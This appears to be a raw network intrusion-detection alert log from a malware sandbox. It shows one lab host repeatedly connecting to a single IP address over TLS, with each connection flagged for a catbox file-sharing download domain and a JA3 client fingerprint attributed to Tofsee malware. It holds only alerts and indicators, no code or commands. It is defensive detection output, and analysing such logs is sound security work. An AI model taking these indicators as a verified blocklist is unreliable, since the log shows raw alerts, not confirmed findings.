TCP 192.168.56.103:49408 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49408 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49408 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49440 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49440 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49440 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49411 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49411 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49411 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49445 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49445 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49445 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49438 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49438 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49438 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49447 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49447 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49447 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49448 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49448 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49200 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49200 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49448 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49459 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49200 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49459 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49459 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49449 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49449 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49449 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49465 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49448 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49465 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49465 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49451 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49451 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49467 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49451 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49467 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49467 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49454 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49454 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49468 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49468 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49468 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49454 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49460 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49460 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49460 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49461 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49461 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49461 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49470 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49470 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49383 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49470 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49390 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49390 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49200 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49473 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49473 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49390 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49473 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49393 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49393 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49473 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49393 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49473 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49464 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49464 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49464 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49477 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49477 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49469 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49469 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49469 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49202 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49475 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49202 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49475 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49475 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49202 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49477 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49488 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49488 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49488 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49480 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49202 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49489 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49489 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49489 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49480 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49480 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49482 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49482 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49482 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49398 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49398 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49398 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49403 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49483 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49483 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49483 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49403 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49403 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49403 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49491 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49491 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49491 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49410 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49410 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49410 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49493 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49493 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49493 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49494 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49415 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49415 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49415 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49420 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49420 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49420 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49494 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49494 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49494 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49497 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49497 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49497 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49498 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49428 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49428 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49428 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49432 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49498 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49498 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49508 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49508 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49432 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49432 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49433 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49508 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49433 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49433 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49441 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49441 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49441 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49442 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49442 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49442 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49443 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49443 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49443 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49456 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49456 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49456 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49472 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49472 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49472 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49492 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49492 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49492 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49496 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49496 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49496 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49496 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49501 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49501 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49501 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49501 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49504 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49504 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49504 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49505 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49505 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49505 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49206 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49206 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49206 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49208 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49208 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49208 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49217 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49217 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49217 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49223 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49223 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49223 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49227 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49227 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49227 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
